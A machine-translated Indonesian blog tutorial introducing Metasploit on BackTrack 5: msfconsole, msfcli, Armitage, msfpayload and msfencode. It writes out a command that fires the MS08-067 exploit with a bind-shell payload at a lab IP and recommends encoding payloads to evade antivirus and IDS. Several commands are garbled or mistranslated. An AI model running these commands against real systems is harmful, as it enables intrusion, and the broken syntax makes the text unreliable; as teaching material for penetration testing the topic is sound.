Metasploit Tutorial: Pendahuluan Reviewed by Unknown on 02:42 Rating: 1

Metasploit Tutorial: Pendahuluan




Metasploit istilah
MSFconsole
MSFcli
Armitage
MSFpayload
MSFencode


Metasploit adalah alat berharga dalam pena pengujian jaringan. Namun, itu bisa sangat membingungkan untuk pemula. Tutorial metaspolit ini akan membantu Anda bangun dan berjalan dengan metasploit. Sebagian besar hacking kita akan ditargetkan untuk mesin windows. Sebagai pengingat dan aturan situs: saya tidak bertanggung jawab atas tindakan Anda! Ini adalah untuk pendidikan hanya!

Reading direkomendasikan: Metasploit: panduan penetrasi Tester

Sebuah buku yang akan menunjukkan sebagian dari kerangka metasploit. Namun, ia meninggalkan Anda untuk menemukan kekuatan sejati dari metasploit untuk diri sendiri. Secara keseluruhan, sangat dianjurkan.

Metasploit istilah

Mengeksploitasi-untuk mengambil keuntungan dari kelemahan keamanan dalam sistem, Jaringan, atau aplikasi.
Muatan - adalah kode yang komputer korban kita untuk melaksanakan dengan kerangka metasploit.
Modul - sepotong kecil kode yang dapat ditambahkan ke metasploit kerangka kerja untuk melaksanakan serangan.
Shellcode-sepotong kecil kode yang digunakan sebagai muatan.

MSFconsole

Msfconsole adalah semua-dalam-satu antarmuka untuk sebagian besar fitur dalam metasploit. Msfconsole dapat digunakan untuk meluncurkan serangan, membuat pendengar, dan banyak, banyak lagi. Kami akan menggunakan Msfconsole seluruh tutorial ini, tetapi menguasai itu akan memungkinkan Anda untuk menjaga dengan metaspolits yang cepat berubah kerangka. Metasploit datang diinstal secara default pada backtrack 5. Untuk mengakses msfconsole, membuka konsol Anda dan jenis:

root@BT: ~ # cd/opt/framework3/msf3 /
root@BT: ~#/opt/framework3/msf3# msfconsole

Setelah suatu waktu, msfconsole akan boot.


Untuk melihat file bantuan, cukup ketik bantuan diikuti oleh perintah yang Anda ingin tahu lebih banyak tentang. Dalam kasus kami, kami ingin belajar tentang perintah connect. Perintah connect memungkinkan kita untuk berkomunikasi dengan sebuah host.

MSF mengatakan membantu menghubungkan

MSFcli

Msfcli adalah cara lain untuk mengakses kerangka metasploit tetapi lebih memfokuskan pada scripting dan interpretability dengan alat-alat lain berbasis konsol. Untuk melihat jenis bantuan msfcli:

root@BT:~# cd /opt/framework3/msf3
root@BT:~# msfcli -h


Sekarang kita akan melakukan tes kecil lari dari msfcli. Penting untuk dicatat setiap kali Anda belajar metasploit dan Anda terjebak, Anda dapat melihat pilihan dalam modul dengan menambahkan huruf O ke akhir baris. Sebagai contoh:

o windows/smb/ms08_067_netapt root@BT:~# msfcli

Modul ini memerlukan tiga pilihan: RHOST, RPORT dan SMPIPE. Menambahkan P untuk akhir memungkinkan kita untuk melihat muatan apa yang dapat kita gunakan.

root@BT~# msfcli windows/smb/ms08_067_netapi RHOST = 192.168.56.101 P

kita dapat menjalankan mengeksploitasi kami dengan memilih muatan, mengisi pilihan, dan menjalankannya dengan melewati huruf E untuk ned msfcli argumen string.

root@BT~# msfcli windows/smb/ms08_067_netapi RHOST = 192.168.56.101 muatan = bind_tcp/windows/shell E

Catatan: alamat IP yang ditugaskan untuk RHOST adalah mesin windows XP yang saya miliki di mesin virtaul. Itu akan bertindak sebagai mesin korban kami untuk pengujian. Anda akan harus melakukan hal yang sama dengan komputer lain atau mesin virtual. Untuk latihan, tidak memperbarui komputer korban atau menginstal anti virus. Kami ingin untuk dapat menggunakan eksploitasi kami tanpa mereka berada ditambal atas dengan windows update. Kita akan pergi selama ini lebih mendalam nanti.

Komponen armitage adalah antarmuka pengguna grafis interaktif penuh.
Menjalankan Armitage

Menjalankan perintah armitage.
Pilih mulai MSF.

MSFpayload

Komponen msfpayload metasploit yang menghasilkan shellcode, dan executable. Shellcoe dapat bew dihasilkan dalam berbagai format termasuk C, Ruby, JavaScript, dan bahkan Visuabl dasar. Setiap output akan berguna dalam berbagai situasi.

Untuk msfpayload membantu jenis: root@bt~# msfpayload -h

Seperti msfcli, jika Anda perlu untuk mengetahui opsi yang diperlukan, menambahkan huruf O pada baris perintah.

root@BT:~# msfpayload windows/shell_reverse_tcp O

MSFencode

Shellcode yang dihasilkan oleh msfpayload fungsional, tapi mengandung beberapa null karakter yang, ketika ditafsirkan oleh banyak program, menandakan akhir string, dan ini akan menyebabkan kode untuk mengakhiri sebelum selesai.

Selain itu, shellcode melintasi jaringan cleartext mungkin untuk dijemput oleh sistem deteksi intrusi (IDSs) dan perangkat lunak antivirus. Untuk mengatasi masalah ini, pengembang Metasploit's menawarkan msfencode, yang membantu Anda untuk menghindari buruk karakter dan menghindari antivirus dan IDSs oleh pengkodean muatan asli dengan cara yang tidak termasuk "buruk" karakter.

Masukkan msfencode -h untuk melihat daftar pilihan msfencode.

Metasploit berisi sejumlah encoders yang berbeda untuk situasi yang berbeda. Beberapa akan berguna ketika Anda bisa gunakan hanya karakter alfanumerik sebagai bagian dari payload, seperti halnya dengan banyak file format eksploitasi atau aplikasi lain yang menerima hanya dicetak karakter sebagai masukan, sementara yang lain besar tujuan umum encoders yang berbuat baik dalam setiap situasi. Encoder yang sangat populer dan terkenal adalah: x 86 shikata_ga_nai encoder.

Untuk melihat daftar encoders tersedia, menambahkan -l msfencode seperti yang ditunjukkan berikutnya. Muatan diurutkan kehandalan.

root@BT:~# msfencode -l



Anda sedang membaca artikel berjudul Metasploit Tutorial: Pendahuluan yang ditulis oleh ABOUT IT yang berisi tentang : Dan Maaf, Anda tidak diperbolehkan mengcopy paste artikel ini.

Jika Anda menyukai Artikel di blog ini, Silahkan berlangganan gratis via email, dengan begitu Anda akan mendapat kiriman artikel setiap ada artikel yang terbit di ABOUT IT

0 comments:

Post a Comment

Back to top